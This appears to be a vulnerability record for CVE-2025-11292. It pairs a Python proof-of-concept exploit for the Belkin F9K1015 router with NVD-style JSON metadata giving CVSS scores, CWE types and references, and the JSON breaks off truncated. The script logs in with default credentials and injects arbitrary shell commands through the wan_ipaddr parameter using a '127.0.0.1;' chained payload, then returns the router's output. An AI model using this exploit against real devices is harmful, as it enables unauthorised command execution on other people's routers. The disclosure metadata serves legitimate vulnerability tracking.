CVE-2025-11292

#!/usr/bin/env python3 # -*- coding: utf-8 -*- """ CVE-2025-11292 - Belkin F9K1015 Command Injection PoC Vulnerability: Command injection via wan_ipaddr parameter in /goform/formBSSetSitesurvey """ import requests import sys from urllib.parse import quote TARGET = "http://192.168.1.1" USERNAME = "admin" PASSWORD = "password" def exploit(target, cmd): """ Exploit the command injection vulnerability in formBSSetSitesurvey endpoint. The wan_ipaddr parameter is passed unsanitized to a shell command. """ session = requests.Session() # Step 1: Authenticate to the router's web management interface login_url = f"{target}/login.cgi" login_data = { "login_name": USERNAME, "login_pass": PASSWORD, "submit": "Login" } session.post(login_url, data=login_data, timeout=10) # Step 2: Inject OS command via wan_ipaddr parameter # Using semicolon (;) to chain arbitrary commands payload = f"127.0.0.1;{cmd}" exploit_url = f"{target}/goform/formBSSetSitesurvey" exploit_data = { "wan_ipaddr": payload, "submit": "Apply" } try: resp = session.post(exploit_url, data=exploit_data, timeout=10) print(f"[+] Payload sent: {payload}") print(f"[+] Status code: {resp.status_code}") print(f"[+] Response length: {len(resp.text)}") return resp.text except Exception as e: print(f"[-] Exploit failed: {e}") return None if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: {sys.argv[0]} <command>") print(f"Example: {sys.argv[0]} 'id'") sys.exit(1) command = sys.argv[1] print(f"[*] Targeting: {TARGET}") print(f"[*] Command to execute: {command}") result = exploit(TARGET, command) if result: print(f"[+] Response:\n{result[:500]}")

{"cve": {"id": "CVE-2025-11292", "sourceIdentifier": "[email protected]", "published": "2025-10-05T14:15:31.963", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A weakness has been identified in Belkin F9K1015 1.00.10. Affected is an unknown function of the file /goform/formBSSetSitesurvey. Executing a manipulation of the argument wan_ipaddr can lead to command injection. The attack can be launched remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-77"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:belkin:f9k1015_firmware:1.00.10:*:*:*:*:*:*:*", "matchCriteriaId": "3DEB0AFD-4E01-4FD5-8A41-6BD0E2D4DF0B"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:belkin:f9k1015:-:*:*:*:*:*:*:*", "matchCriteriaId": "0D273CA6-07A9-43B2-87B3-D0DE1A5B89FA"}]}]}], "references": [{"url": "https://github.com/panda666-888/vuls/blob/main/belkin/f9k1015/formBSSetSitesurvey.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/panda666-888/vuls/blob/main/belkin/f9k1015/formBSSetSitesurvey.md#poc", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.327173", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.327173", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.661295", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB E ... (truncated)